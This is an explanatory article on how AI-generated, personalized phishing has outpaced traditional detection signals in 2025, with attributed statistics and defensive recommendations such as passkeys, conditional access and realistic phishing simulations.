The standard advice for spotting phishing emails — look for grammar errors, suspicious sender addresses, urgent language — was built around a threat model that assumed attackers were working manually or with crude automation. That assumption has been increasingly wrong since late 2023, and the 2025 data makes it hard to ignore.
A 2025 academic study found that AI-crafted phishing emails achieved a 54% click rate, compared to 12% for human-written ones. Campaigns attributed to AI-assisted tools rose roughly 400% between June and November 2025, according to Varonis's State of Phishing Report. The Anti-Phishing Working Group recorded more than 892,000 phishing attacks in Q3 2025 alone. The scale and quality have changed simultaneously, which is an unusual combination.
Why the traditional signals have stopped working
Generative AI can produce grammatically clean, contextually plausible, multilingual phishing emails at scale. The grammar check that used to catch a meaningful percentage of attempts no longer does. More concerning is the personalization: attackers can feed scraped LinkedIn data, public GitHub activity, or leaked corporate directories into an LLM to generate emails that reference an actual project, a real colleague's name, or a genuine internal process. When an email reads as if it came from someone in your organization who knows what you're working on, the psychological triggers that normally prompt skepticism don't fire.
There's also been growth in more technically sophisticated techniques. Researchers in 2025 documented blob URI phishing attacks — pages rendered inside the browser using data URIs that bypass traditional URL scanners and AI-based email filters. These pages capture login credentials using browser-based rendering that most security tools weren't looking for.
By early 2025, AI-powered phishing made up over 80% of observed social engineering activity. That figure comes from SentinelOne's analysis and may vary depending on how campaigns are classified, but the directional signal is consistent across multiple sources.
Who gets targeted and what the outcome typically looks like
Financial services remain the most heavily targeted sector — credentials from banking systems are immediately monetizable. Financial institutions account for roughly 23.5% of all phishing attacks globally (APWG, 2024–2025 data). Healthcare is targeted differently: the goal is usually data for insurance fraud or identity theft rather than immediate financial access, but the per-incident cost is higher — the average healthcare data breach hit $11.2 million in 2025.
Stolen credentials are the most common outcome. About 22% of breaches now involve credential theft as the initial vector, and the dwell time — how long attackers persist before detection — tends to be longer when the entry point was a legitimate account rather than an exploited vulnerability. An attacker using valid credentials looks normal to a lot of monitoring tools.
SIM swapping remains a persistent amplifier. Once attackers have a username and password, SMS-based two-factor authentication doesn't provide meaningful protection if they can transfer the victim's phone number by social engineering the mobile carrier. This is one reason hardware security keys (FIDO2) have been pushed by security teams who've dealt with this pattern in practice.
What actually helps
Phishing simulations that include AI-generated samples, rather than older template-based attacks, give employees exposure to the current threat model rather than a 2019 version of it. There's a meaningful difference in how people respond to well-constructed, personalized messages versus the generic "your account will be suspended" templates.
Passkeys — the FIDO2-based credential standard — are phishing-resistant by design. A passkey is domain-bound: it won't authenticate to a fake site that looks like your bank, because the authentication involves a cryptographic challenge that the legitimate site's domain must satisfy. This is a structural defense rather than a behavioral one, which is why security teams tend to prefer it. The adoption curve is still relatively early, but it's worth noting that this technology exists and works.
Conditional access policies — requiring device compliance checks, location constraints, or step-up authentication for sensitive actions — can limit what a stolen credential actually unlocks. The principle of least privilege matters here: an account with broad access is a better target than one with narrow permissions, and credentials are more useful to an attacker when the account can reach many systems.
The honest assessment is that detection-based defenses are in a losing position against sufficiently sophisticated AI-generated attacks. The more durable approaches focus on what authenticated credentials can actually do, rather than trying to catch every malicious email before it lands.